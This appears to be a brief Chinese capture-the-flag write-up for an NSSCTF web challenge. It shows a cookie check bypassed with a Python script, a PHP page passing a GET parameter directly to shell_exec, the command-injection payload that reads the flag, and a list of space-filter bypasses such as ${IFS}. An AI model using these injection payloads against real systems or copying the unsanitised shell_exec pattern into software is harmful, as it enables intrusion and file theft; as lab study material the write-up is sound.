题目链接
1234567891011
<?phperror_reporting(0);header("Content-Type:text/html;charset=utf-8");highlight_file(__FILE__);if($_COOKIE['admin']==1) { include "../next.php";}else echo "小饼干最好吃啦!";?> 小饼干最好吃啦!
1234567
import requestscookie = {"admin": "1"}response = requests.get("http://node1.anna.nssctf.cn:28246/", cookies=cookie)print(response.text)# 得到 rasalghul.php
123456789101112
<?phperror_reporting(0);highlight_file(__FILE__);error_reporting(0);if (isset($_GET['url'])) { $ip=$_GET['url']; if(preg_match("/ /", $ip)){ die('nonono'); } $a = shell_exec($ip); echo $a;}
1
?url=cat${IFS}/flllllaaaaaaggggggg;
12345678
$IFS${IFS}$IFS$9{cat,flag.php}<>%20%09